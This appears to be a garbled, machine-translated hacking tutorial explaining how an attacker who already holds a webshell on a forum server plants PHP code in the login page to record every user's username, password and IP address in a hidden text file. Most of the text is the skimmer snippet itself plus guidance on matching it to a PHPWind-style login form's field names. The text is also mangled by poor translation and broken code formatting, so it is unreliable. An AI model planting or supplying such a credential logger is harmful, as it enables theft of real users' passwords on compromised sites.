After obtaining webshell, it is difficult to crack the password for further penetration, such as discuz, instead of using md5 encryption directly. I used to write it for big data once. I wrote it again yesterday when the big brother pig was easy to use. The code is relatively simple. In a few words, I will explain the principle in detail and take care of some friends who do not know much about php. If ($ _ POST [loginsubmit]! =) {// Determine whether the login button is clicked $ sb = user :. $ _ POST [username]. -- passwd :. $ _ POST [password]. -- ip :. $ HTTP_SERVER_VARS [REMOTE_ADDR]. --. date (Y-m-d H: I: s ). rn; // concatenate the value received by POST and assign the value to the variable $ sb fwrite(fopen(robot.txt, AB), $ sb);} // write the result into a file for a brief analysis, take the login page of China as an example. Right-click bbs.xxx.com/login.php and right-click it to view the source code. Press CTRL + F to search for action and find the login form. I only copied the key code. <form action = login. php? Method = post name = login onSubmit = this. submit. disabled = true;> // The value after the action is the address submitted by the form, which will process login. For example, if the method to determine whether the password is correct or not is POST, it is received with $ _ POST. .... Powerful ellipsis ...... <TR> <TD height = 40> account (<U> U </U> ): <BR> <INPUT class = input id = pwuser accessKey = u size = 16 name = pwuser> </TD> </TR> // user name input box, note that the value of its name must correspond to $ _ POST [username]. Therefore, you must intercept the Chinese password, change to $ _ POST [pwuser] <TR> <TD height = 40> password (<U> P </U> ): <BR> <INPUT class = input id = pwpwd accessKey = p type = password size = 16 name = pwpwd> </TD> </TR> // input box for the user name, note that the value of its name must correspond to $ _ POST [username]. To intercept the Chinese password, change it to $ _ POST [pwpwd].